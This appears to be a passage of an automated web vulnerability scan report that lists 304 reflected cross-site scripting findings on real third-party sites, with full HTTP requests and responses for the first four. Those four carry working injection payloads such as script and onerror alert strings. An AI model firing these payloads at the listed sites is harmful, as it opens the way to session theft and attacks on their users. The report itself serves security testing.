1.153. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/page/2 [REST URL parameter 4]

1.154. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/page/2 [REST URL parameter 5]

1.155. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/page/2 [REST URL parameter 6]

1.156. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/page/2 [REST URL parameter 7]

1.157. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/page/2 [name of an arbitrarily supplied request parameter]

1.158. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js [REST URL parameter 1]

1.159. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js [REST URL parameter 2]

1.160. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js [REST URL parameter 3]

1.161. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js [REST URL parameter 4]

1.162. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js [REST URL parameter 5]

1.163. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js [name of an arbitrarily supplied request parameter]

1.164. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2 [REST URL parameter 1]

1.165. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2 [REST URL parameter 2]

1.166. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2 [REST URL parameter 3]

1.167. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2 [REST URL parameter 4]

1.168. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2 [REST URL parameter 5]

1.169. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2 [REST URL parameter 6]

1.170. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2 [REST URL parameter 7]

1.171. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2 [name of an arbitrarily supplied request parameter]

1.172. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js [REST URL parameter 1]

1.173. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js [REST URL parameter 2]

1.174. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js [REST URL parameter 3]

1.175. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js [REST URL parameter 4]

1.176. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js [REST URL parameter 5]

1.177. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js [name of an arbitrarily supplied request parameter]

1.178. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2 [REST URL parameter 1]

1.179. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2 [REST URL parameter 2]

1.180. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2 [REST URL parameter 3]

1.181. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2 [REST URL parameter 4]

1.182. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2 [REST URL parameter 5]

1.183. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2 [REST URL parameter 6]

1.184. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2 [REST URL parameter 7]

1.185. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2 [name of an arbitrarily supplied request parameter]

1.186. http://www.installsoftware.com/wp-content/plugins/wp-followme/flash/wp_followme.swf [REST URL parameter 1]

1.187. http://www.installsoftware.com/wp-content/plugins/wp-followme/flash/wp_followme.swf [REST URL parameter 2]

1.188. http://www.installsoftware.com/wp-content/plugins/wp-followme/flash/wp_followme.swf [REST URL parameter 3]

1.189. http://www.installsoftware.com/wp-content/plugins/wp-followme/flash/wp_followme.swf [REST URL parameter 4]

1.190. http://www.installsoftware.com/wp-content/plugins/wp-followme/flash/wp_followme.swf [REST URL parameter 5]

1.191. http://www.installsoftware.com/wp-content/plugins/wp-followme/flash/wp_followme.swf [name of an arbitrarily supplied request parameter]

1.192. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [REST URL parameter 1]

1.193. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [REST URL parameter 2]

1.194. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [REST URL parameter 3]

1.195. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [REST URL parameter 4]

1.196. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [REST URL parameter 5]

1.197. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [name of an arbitrarily supplied request parameter]

1.198. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [REST URL parameter 1]

1.199. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [REST URL parameter 2]

1.200. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [REST URL parameter 3]

1.201. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [REST URL parameter 4]

1.202. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [REST URL parameter 5]

1.203. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [name of an arbitrarily supplied request parameter]

1.204. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [REST URL parameter 1]

1.205. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [REST URL parameter 2]

1.206. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [REST URL parameter 3]

1.207. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [REST URL parameter 4]

1.208. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [REST URL parameter 5]

1.209. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [name of an arbitrarily supplied request parameter]

1.210. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [REST URL parameter 1]

1.211. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [REST URL parameter 2]

1.212. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [REST URL parameter 3]

1.213. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [REST URL parameter 4]

1.214. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [REST URL parameter 5]

1.215. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [name of an arbitrarily supplied request parameter]

1.216. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [REST URL parameter 1]

1.217. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [REST URL parameter 2]

1.218. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [REST URL parameter 3]

1.219. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [REST URL parameter 4]

1.220. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [REST URL parameter 5]

1.221. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [name of an arbitrarily supplied request parameter]

1.222. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [REST URL parameter 1]

1.223. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [REST URL parameter 2]

1.224. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [REST URL parameter 3]

1.225. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [REST URL parameter 4]

1.226. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [REST URL parameter 5]

1.227. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [name of an arbitrarily supplied request parameter]

1.228. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.js [REST URL parameter 1]

1.229. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.js [REST URL parameter 2]

1.230. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.js [REST URL parameter 3]

1.231. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.js [REST URL parameter 4]

1.232. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.js [REST URL parameter 5]

1.233. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.js [name of an arbitrarily supplied request parameter]

1.234. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js [REST URL parameter 1]

1.235. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js [REST URL parameter 2]

1.236. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js [REST URL parameter 3]

1.237. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js [REST URL parameter 4]

1.238. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js [REST URL parameter 5]

1.239. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js [REST URL parameter 6]

1.240. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js [name of an arbitrarily supplied request parameter]

1.241. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 1]

1.242. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 2]

1.243. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 3]

1.244. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 4]

1.245. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 5]

1.246. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 6]

1.247. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 7]

1.248. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 8]

1.249. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [name of an arbitrarily supplied request parameter]

1.250. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 1]

1.251. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 2]

1.252. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 3]

1.253. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 4]

1.254. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 5]

1.255. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 6]

1.256. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 7]

1.257. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 8]

1.258. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [name of an arbitrarily supplied request parameter]

1.259. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [REST URL parameter 1]

1.260. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [REST URL parameter 2]

1.261. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [REST URL parameter 3]

1.262. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [REST URL parameter 4]

1.263. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [REST URL parameter 5]

1.264. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [name of an arbitrarily supplied request parameter]

1.265. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [REST URL parameter 1]

1.266. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [REST URL parameter 2]

1.267. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [REST URL parameter 3]

1.268. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [REST URL parameter 4]

1.269. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [REST URL parameter 5]

1.270. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [name of an arbitrarily supplied request parameter]

1.271. http://www.installsoftware.com/xmlrpc.php [REST URL parameter 1]

1.272. http://www.intensedebate.com/ [name of an arbitrarily supplied request parameter]

1.273. http://www.intensedebate.com/js/genericCommentWrapperV2.js [REST URL parameter 2]

1.274. http://www.intensedebate.com/themes/chameleon/css/idcCSS.php [REST URL parameter 4]

1.275. http://www.intensedebate.com/themes/chameleon/css/idcCSS.php [name of an arbitrarily supplied request parameter]

1.276. http://www.intensedebate.com/wCSS.php [REST URL parameter 1]

1.277. http://www.intensedebate.com/wCSS.php [name of an arbitrarily supplied request parameter]

1.278. http://www.intensedebate.com/widgets/acctComment/22911/5 [REST URL parameter 1]

1.279. http://www.intensedebate.com/widgets/acctComment/22911/5 [REST URL parameter 3]

1.280. http://www.metacafe.com/fplayer/ [name of an arbitrarily supplied request parameter]

1.281. http://www.paloaltonetworks.com/literature/forms/ebook/index.php [name of an arbitrarily supplied request parameter]

1.282. http://www.scstudio.tv/ [name of an arbitrarily supplied request parameter]

1.283. http://www.scstudio.tv/favicon.ico [name of an arbitrarily supplied request parameter]

1.284. http://www.scvision.tv/ [name of an arbitrarily supplied request parameter]

1.285. http://www.scwebcasts.tv/ [name of an arbitrarily supplied request parameter]

1.286. http://www.technewsworld.com/mwjson/ [action parameter]

1.287. http://www.tradingmarkets.com/news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp [REST URL parameter 1]

1.288. http://www.tradingmarkets.com/news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp [REST URL parameter 2]

1.289. http://www.tradingmarkets.com/news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp [REST URL parameter 3]

1.290. http://www.tradingmarkets.com/news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp [REST URL parameter 4]

1.291. http://www.tradingmarkets.com/news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp [name of an arbitrarily supplied request parameter]

1.292. http://www.tradingmarkets.com/news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp [rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dteNGTZzQLsb_lged9pk8\\x26amp;ved\\x3d0CC4Q-AsoATAA\\x26amp;q\\x3dcross+site+scripting\\x26amp;usg\\x3dAFQjCNHA8oKYn9FF9KIbtgEvk7ET4aEESg\\x22 parameter]

1.293. http://www.channelinsider.com/c/a/Security/Social-Media-Applications-a-Threat-to-Businesses-Report-707207/x22 [Referer HTTP header]

1.294. http://www.haymarketbusinesssubs.com/subscriptions/ [Referer HTTP header]

1.295. http://www.tradingmarkets.com/news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp [Referer HTTP header]

1.296. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

1.297. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

1.298. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

1.299. http://ar.voicefive.com/bmx3/broker.pli [ar_p45555483 cookie]

1.300. http://ar.voicefive.com/bmx3/broker.pli [ar_p67161473 cookie]

1.301. http://ar.voicefive.com/bmx3/broker.pli [ar_p68511049 cookie]

1.302. http://ar.voicefive.com/bmx3/broker.pli [ar_p83612734 cookie]

1.303. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]

1.304. http://www.feedblitz.com/f/f.fbz [name of an arbitrarily supplied request parameter]



1. Cross-site scripting (reflected)
There are 304 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://app.quotemedia.com/quotetools/clientForward [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://app.quotemedia.com
Path:   /quotetools/clientForward

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dc7e6<img%20src%3da%20onerror%3dalert(1)>ac1cc16112d was submitted in the REST URL parameter 1. This input was echoed as dc7e6<img src=a onerror=alert(1)>ac1cc16112d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotetoolsdc7e6<img%20src%3da%20onerror%3dalert(1)>ac1cc16112d/clientForward HTTP/1.1
Host: app.quotemedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/2.1.14
Cache-Control: private
Set-Cookie: JSESSIONID=bEzcsHlMkwE6; path=/
Content-Type: text/html
Date: Mon, 31 Jan 2011 17:19:30 GMT
Content-Length: 1250

<title>404 Invalid path /quotetoolsdc7e6<img src=a onerror=alert(1)>ac1cc16112d/invalidSite was requested</title>
<h1>404 Invalid path /quotetoolsdc7e6<img src=a onerror=alert(1)>ac1cc16112d/invalidSite was requested</h1>
...[SNIP]...

1.2. http://ar.voicefive.com/b/rc.pli [func parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 7bb68<script>alert(1)</script>56b71eeb362 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction7bb68<script>alert(1)</script>56b71eeb362&n=ar_int_p85001580&1296491560510 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.22;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a/L46/1678441172/Top1/USNetwork/BCN2010110276_004_RadioShack/RadioShack_RTG_728.html/726348573830307044726341416f7670?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/RadioShack/SELL_2011Q1/RTG/728/L36/772729617/x90/USNetwork/RS_SELL_2011Q1_247_RTG_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=772729617?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=1&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 16:31:23 2011&prad=264243128&arc=186035359&; ar_p85001580=exp=40&initExp=Wed Jan 26 20:14:29 2011&recExp=Mon Jan 31 16:32:02 2011&prad=58087570&arc=40401349&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296491524%2E335%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:09:01 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction7bb68<script>alert(1)</script>56b71eeb362("");

1.3. http://ar.voicefive.com/bmx3/broker.pli [AR_C parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the AR_C request parameter is copied into the HTML document as plain text between tags. The payload f00d0<script>alert(1)</script>4ba25d4dfdf was submitted in the AR_C parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bmx3/broker.pli?pid=p68511049&PRAd=264243128&AR_C=186035359f00d0<script>alert(1)</script>4ba25d4dfdf HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://redcated/MRT/iview/264243128/direct;wi.640;hi.480/01?ENN_rnd=12964914777625&click=http://www.ectnews.com/adsys/link/%3Fcreative%3d7040%26ENN_rnd%3d12964914777625%26ENN_target=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:09:05 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p68511049=exp=1&initExp=Mon Jan 31 17:09:05 2011&recExp=Mon Jan 31 17:09:05 2011&prad=264243128&arc=186035359f00d0%3Cscript%3Ealert%281%29%3C%2Fscript%3E4ba25d4dfdf&; expires=Sun 01-May-2011 17:09:05 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296493745; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25241

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"264243128",Pid:"p68511049",Arc:"186035359f00d0<script>alert(1)</script>4ba25d4dfdf",Location:COMSCORE.BMX.Broker.Location,Title:COMSCORE.BMX.Broker.Title,Referrer:COMSCORE.BMX.Broker.Referrer,Grp:COMSCORE.BMX.Broker.getGrp("186035359f00d0<script>
...[SNIP]...

1.4. http://ar.voicefive.com/bmx3/broker.pli [PRAd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the PRAd request parameter is copied into the HTML document as plain text between tags. The payload ce57c<script>alert(1)</script>1e6668e0674 was submitted in the PRAd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bmx3/broker.pli?pid=p68511049&PRAd=264243128ce57c<script>alert(1)</script>1e6668e0674&AR_C=186035359 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://redcated/MRT/iview/264243128/direct;wi.640;hi.480/01?ENN_rnd=12964914777625&click=http://www.ectnews.com/adsys/link/%3Fcreative%3d7040%26ENN_rnd%3d12964914777625%26ENN_target=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:09:04 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p68511049=exp=1&initExp=Mon Jan 31 17:09:04 2011&recExp=Mon Jan 31 17:09:04 2011&prad=264243128ce57c%3Cscript%3Ealert%281%29%3C%2Fscript%3E1e6668e0674&arc=186035359&; expires=Sun 01-May-2011 17:09:04 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296493744; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25200

